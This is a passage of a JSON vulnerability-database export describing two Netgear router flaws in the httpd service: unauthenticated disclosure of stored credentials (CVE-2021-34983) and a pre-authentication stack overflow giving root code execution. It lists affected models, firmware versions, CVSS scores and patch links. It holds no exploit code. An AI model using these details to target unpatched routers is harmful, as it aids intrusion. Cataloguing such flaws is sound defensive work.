"trust": 1.0,
"vendor": "netgear",
"version": "1.4.2.84"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.76"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "v6510-1fxaus",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.80"
},
{
"model": "rax80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.132"
},
{
"model": "xr300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.68"
},
{
"model": "raxe500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.8.70"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "rs400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.5.1.80"
},
{
"model": "r6700v3",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.120"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.108"
},
{
"model": "rax38v2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.2.84"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.120"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "ms80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.10"
},
{
"model": "rax48",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.70"
},
{
"model": "xr1000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "rax50",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.156"
},
{
"model": "rax40v2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.76"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.148"
},
{
"model": "dc112a",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "mr60",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.122"
},
{
"model": "ex7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.76"
},
{
"model": "rax43",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.106"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.126"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.11.128"
},
{
"model": "ms60",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.122"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.2.84"
},
{
"model": "rax15",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "rax45",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "lax20",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.30"
},
{
"model": "rax50s",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "rax42",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "r7850",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.76"
},
{
"model": "raxe450",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.8.70"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.148"
},
{
"model": "rax20",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.156"
},
{
"model": "mr80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.10"
},
{
"model": "rax200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.132"
},
{
"model": "d6220",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex3700",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "xr300",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex6120",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ms60",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex7500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "xr1000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex6130",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d6400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "lax20",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "mr80",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "dc112a",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex3800",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "d7000v2",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "dgn2200v4",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ms80",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "mr60",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "v6510-1fxaus",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "multiple routers",
"scope": null,
"trust": 0.7,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1275"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021935"
},
{
"db": "NVD",
"id": "CVE-2021-34983"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Sungur Labs",
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1275"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2191"
}
],
"trust": 1.3
},
"cve": "CVE-2021-34983",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2021-34983",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Adjacent Network",
"author": "OTHER",
"availabilityImpact": "None",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2021-021935",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2021-34983",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2021-34983",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "OTHER",
"id": "JVNDB-2021-021935",
"trust": 0.8,
"value": "Medium"
},
{
"author": "ZDI",
"id": "CVE-2021-34983",
"trust": 0.7,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202110-2191",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1275"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021935"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2191"
},
{
"db": "NVD",
"id": "CVE-2021-34983"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "NETGEAR Multiple Routers httpd Missing Authentication for Critical Function Information Disclosure Vulnerability. This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of multiple NETGEAR routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the httpd service, which listens on TCP port 80 by default. The issue results from the lack of authentication prior to allowing access to system configuration information. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-13708",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-34983"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021935"
},
{
"db": "ZDI",
"id": "ZDI-21-1275"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-34983",
"trust": 3.9
},
{
"db": "ZDI",
"id": "ZDI-21-1275",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021935",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-13708",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2191",
"trust": 0.6
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1275"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021935"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2191"
},
{
"db": "NVD",
"id": "CVE-2021-34983"
}
]
},
"id": "VAR-202110-1807",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.42902259035714285
},
"last_update_date": "2025-08-20T23:06:15.645000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "NETGEAR has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://kb.netgear.com/000064313/Security-Advisory-for-Pre-Authentication-Buffer-Overflow-on-Some-Extenders-Routers-and-DSL-Modem-Routers-PSV-2021-0159"
},
{
"title": "Netgear NETGEAR Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=167951"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1275"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2191"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-306",
"trust": 1.0
},
{
"problemtype": "Lack of authentication for critical features (CWE-306) [ others ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-021935"
},
{
"db": "NVD",
"id": "CVE-2021-34983"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://kb.netgear.com/000064313/security-advisory-for-pre-authentication-buffer-overflow-on-some-extenders-routers-and-dsl-modem-routers-psv-2021-0159"
},
{
"trust": 2.4,
"url": "https://www.zerodayinitiative.com/advisories/zdi-21-1275/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-34983"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1275"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021935"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2191"
},
{
"db": "NVD",
"id": "CVE-2021-34983"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-21-1275"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-021935"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-2191"
},
{
"db": "NVD",
"id": "CVE-2021-34983"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-29T00:00:00",
"db": "ZDI",
"id": "ZDI-21-1275"
},
{
"date": "2025-08-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-021935"
},
{
"date": "2021-10-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-2191"
},
{
"date": "2024-05-07T23:15:13.573000",
"db": "NVD",
"id": "CVE-2021-34983"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-10-29T00:00:00",
"db": "ZDI",
"id": "ZDI-21-1275"
},
{
"date": "2025-08-18T05:10:00",
"db": "JVNDB",
"id": "JVNDB-2021-021935"
},
{
"date": "2021-11-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-2191"
},
{
"date": "2025-08-14T01:40:56.983000",
"db": "NVD",
"id": "CVE-2021-34983"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability related to lack of authentication for important functions in multiple NETGEAR products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-021935"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-2191"
}
],
"trust": 0.6
}
}
VAR-202110-1806
Vulnerability from variot - Updated: 2025-08-16 23:08NETGEAR Multiple Routers httpd Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of multiple NETGEAR routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the httpd service, which listens on TCP port 80 by default. When parsing the strings file, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-13709. DC112A firmware, EX3700 firmware, EX3800 Multiple Netgear products, including firmware, contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202110-1806",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rax35v2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "r7960p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.2.84"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.76"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "v6510-1fxaus",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.80"
},
{
"model": "rax80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.132"
},
{
"model": "xr300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.68"
},
{
"model": "raxe500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.8.70"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "rs400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.5.1.80"
},
{
"model": "r6700v3",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.120"
},
{
"model": "wndr3400v3",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.108"
},
{
"model": "rax38v2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.2.84"
},
{
"model": "r6400v2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.120"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "ms80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.10"
},
{
"model": "rax48",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "wnr3500lv2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.70"
},
{
"model": "xr1000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "rax50",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.156"
},
{
"model": "rax40v2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "dgn2200v4",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.126"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.76"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.148"
},
{
"model": "dc112a",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.62"
},
{
"model": "mr60",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.122"
},
{
"model": "ex7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.76"
},
{
"model": "rax43",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.106"
},
{
"model": "rax15",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "rax50s",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.11.128"
},
{
"model": "ms60",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.122"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.2.84"
},
{
"model": "rax45",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "rax75",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.132"
},
{
"model": "lax20",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.30"
},
{
"model": "d7000v2",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "rax42",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "r7850",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.76"
},
{
"model": "raxe450",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.8.70"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.3.148"
},
{
"model": "rax20",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.100"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.156"
},
{
"model": "mr80",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.6.10"
},
{
"model": "rax200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.5.132"
},
{
"model": "mr80",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex6130",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7850",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6900p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "dc112a",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400v2",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "mr60",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex3800",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6400",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ms60",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7100lg",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r6700v3",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex6120",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex7500",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ms80",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "lax20",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex7000",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "ex3700",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "r7000p",
"scope": null,
"trust": 0.8,
"vendor": "\u30cd\u30c3\u30c8\u30ae\u30a2",
"version": null
},
{
"model": "multiple routers",
"scope": null,
"trust": 0.7,
"vendor": "netgear",
"version": null
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-21-1274"
},
{
"db": "JVNDB",
